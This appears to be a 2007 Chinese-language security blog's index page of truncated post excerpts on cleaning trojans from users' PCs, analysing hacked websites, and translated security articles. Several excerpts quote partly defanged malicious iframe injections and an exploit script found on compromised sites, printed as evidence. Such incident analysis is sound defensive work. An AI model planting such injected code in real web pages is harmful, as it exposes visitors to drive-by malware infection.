其他

文學論壇掛的馬換 成 Worm.Win32.Agent.imh 了endurer 原創2007-08-22 第1版上回妯現掛的是 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt剛才一不小心又進去了，卡巴沒反應~一位剛進去的網友說瑞星發現、並清除了三個 Worm.Win32.Agent.imh，都在IE緩衝裡，檔案名稱是 ga[1].exe之類。檢查論壇代碼，發現：/---＜iframe src="hxxp://www.yo*y*o5**9.com/m*68

;功能: 示範使用系統托盤表徵圖，顯示Balloon Tooltip;作者: PurpleEndurer | 紫郢劍俠㊣ 於 廣西河池;日期 內容;----------------------------------------------------------------------;2007.08.23 完成。;2007.08.21 建立。.386.model flat, stdcalloption casemap: noneinclude /masm32/include/windows.

某VIP會員站被掛馬 down.exeendurer 原創2007-08-23 第2版 補充 瑞星 和 Kaspersky 的回複2007-08-23 第1版 有網友反映，他的電腦中的php檔案裡老是被寫入＜iframe   src=hxxp://down***.***onlinedowns.net/page**/image***/pd.htm   height=0 ＞＜/iframe ＞代碼。 開啟 hxxp://down***.***onlinedowns.net/page**/image*

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<; FileName: TrayIcon.asm;   Function: Dem

遭遇 qfgsw.sys / Trojan-Downloader.Win32.Agent.bbb / Trojan.Win32.Agent.bvl等endurer 原創2007-09-17 第1版昨晚一位網友說近段時間他電腦中的 NOD32總報告：/---時間 模組 對象 名稱 病毒 操作 使用者名稱稱 資訊2007-9-16 21:30:22 AMON 檔案 C:/WINDOWS/system32/drivers/qfgsw.sys

遭遇 Trojan.Win32.KillFiles.m, Packer.Mian007等endurer 原創2007-09-18 第1版剛才一位網友說他的電腦最近啟動很慢，讓偶通過QQ遠程協助檢查。下載 pe_xscan 掃描 log 並分析，發現如下可疑項：/===pe_xscan 07-08-30 by Purple Endurer2007-9-18 12:53:3Windows XP Service Pack

遭遇修改系統時間、使用映像劫持的xibgptd.exe,netdde32.exe等2endurer 原創2007-08-10 第1版(續log)O9 - IE工具列擴充按鈕HKLM：中文上網 - {B012491E-8FA4-4851-AA9B-22E33784FBAD} - C:/Program Files/OCINS/config.exeO9 - IE工具菜單擴充項HKLM：中文上網 - {B012491E-8FA4-4851-AA9B-22E33784FBAD} - C:/Program

偶遇 Trojan.PSW.Win32.OnlineGames.xym,Trojan.Win32.Agent.vvk等endurer 原創2007-09-19  第1版剛才一位網友說他的電腦最近啟動一個程式所需時間比較長。讓偶通過QQ遠程協助檢查。下載 pe_xscan 掃描 log 並分析，發現如下可疑項：/===pe_xscan 07-08-30 by Purple Endurer2007-9-19 13:2:51Windows XP Service Pack

 遭遇一堆 Trojan.PSW.Win32.OnlineGames / *door0.dll等1endurer 原創2007-08-27 第1版一位網友說他的電腦最近開機時金山毒霸出錯，運行很慢，讓偶通過QQ遠程協助幫忙檢查。由於網友的電腦反應確實慢，讓他重啟到帶網路連接的安全模式下再進行。下載了 pe_xscan，解壓後剛運行，檔案忽然不見了……試了幾次都是這樣，難道pe_xscan也被列入惡意程式狙擊的名單了？把 pe_xscan 解壓到 c:/windows/system32

來源：矽谷動力經常用電腦的朋友一定沒有少碰到藍屏，那張冰涼的藍面孔真的很令人討厭。那麼藍屏到底是怎麼產生的呢？ 我們可以從軟、硬兩方面來解釋藍屏現象產生的原因。從硬體方面來說，超頻過度是導致藍屏的一個主要原因。過度超頻，由於進行了超載運算，造成內部運算過多，使CPU過熱，從而導致系統運算錯誤。如果既想超頻，又不想出現藍屏，只有做好散熱措施了，換個強力風扇，再加上一些矽膠之類的散熱材料會好許多。另外，適量超頻或乾脆不超頻也是解決的辦法之一。要穩定還是要更高的速度就看你自己的抉擇了。

網友遇到 Trojan.DL.Win32.Agent.yqv，疑是ARP病毒傳播endurer 原創2007-09-21 第1版一位網友發來 email 說他現在使用電腦瀏覽網頁時，隔一段時間瑞星就會提示發現病毒：/---病毒名稱                        處理結果    發現日期    路徑   檔案Trojan.DL.Script.VBS.Agent.xgp  跳過指令碼    2007-09-20 20:39  C:/DOCUME~1/ADMINI~1/LOCALS~1

某縣農業網被植入利用暴風影音2緩衝區溢位等漏洞的惡意代碼endurer 原創2007-09-25 第1版在 Maxthon 中開啟該網站，Maxthon 會假死幾分鐘。檢查網頁源檔案，發現尾部被加入代碼:/---＜script language=javascript

某雅思培訓網站被掛 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmqendurer 原創2007-09-12 第1版2007-09-13 第2版　補充瑞星對 server.exe 的回複網頁包含代碼：/---＜iframe src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index.htm" frameborder="no" scrolling="no"

遭遇 kapjazy.dll,yhpri.dll,WinSys64.Sys,nwiztlbu.exe,myplayer.com 等1endurer 原創2007-09-14 第1版剛才一位網友說他的電腦中的360衛士不停的提示kapjazy.dll等程式要修改註冊表，請偶協助處理。不過偶這幾天比較忙，讓他下載 pe_xscan 掃描 log 發給我看看。在 log 中發現如下可疑項：/===pe_xscan 07-08-30 by Purple Endurer2007-9-13

遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等2 endurer  原創2007-08-06 第1版還好沒有 O20，處理起不用這麼麻煩~到 http://purpleendurer.ys168.com 下載 bat_do，FreeDLL，FileInfo。先用FreeDLL卸載注入進程的

Be aware of the threat of hidden keystroke-logging devices請注意隱藏擊鍵記錄裝置的威脅Date: September 20th, 2007日期: 2007-09-20Blogger: Mike Mullins部落格：Mike Mullins翻譯：endurer 2007-09-27 第1版Category: Spyware, Malware, Security Solutions 類別：間諜軟體，惡意軟體，安全解決方案英文來源：http:

Five steps to becoming the local security guru5步成為本地安全導師《endurer註：guru:n.古魯(指印度教等宗教的宗師或領袖),領袖》Blogger: Chad Perrin部落格：Chad Perrin翻譯：endurerCategory: Security, Security Solutions分類：安全，安全解決方案Tags: Security, It, Chad Perrin標籤：安全，IT，Chad Perrin英文出處：http:

遭遇 kapjazy.dll,yhpri.dll,WinSys64.Sys,nwiztlbu.exe,myplayer.com 等2endurer 原創2007-09-15 第2版 補充 Kaspersky 和 瑞星 的回複2007-09-14 第1版(繼1)剛才通過QQ遠程協助昨晚那位網友處理。發現網友電腦中的瑞星的病毒庫還是 09-04 的，升級到最新病毒庫後，瑞星監控不停地提示發現病毒：/---病毒名稱                                         

遭遇修改系統時間、使用映像劫持的xibgptd.exe,netdde32.exe<1endurer 原創2007-08-10 第1版今天中午，一位網友說他的電腦中的殺毒軟體無法啟動，開啟包含殺毒等字樣的網頁會自動關閉，不停地提示web.exe程式出錯，不定期彈出廣告視窗。讓偶通過QQ遠程協助。先到 http://endurer.ys168.com 下載 HijackThis，ProcView。運行procView，直接被關閉了。把 HijackThis.exe 改名為 h.exe，再運行，

文學論壇掛的馬 Worm.Win32.Agent.imh 的簡單分析endurer 原創2007-08-23 第1版昨天沒能下載文學論壇掛的馬，剛才再試，終於下載回來了。ga.exe採用UPX殼脫殼前：檔案說明符 : D:/test/ga.exe屬性 : A---擷取檔案版本資訊大小失敗!建立時間 : 2007-8-23 21:9:26修改時間 : 2007-8-23 21:9:28訪問時間 : 2007-8-23 0:0:0大小 : 16933 位元組 16.549 KBMD5 : 72525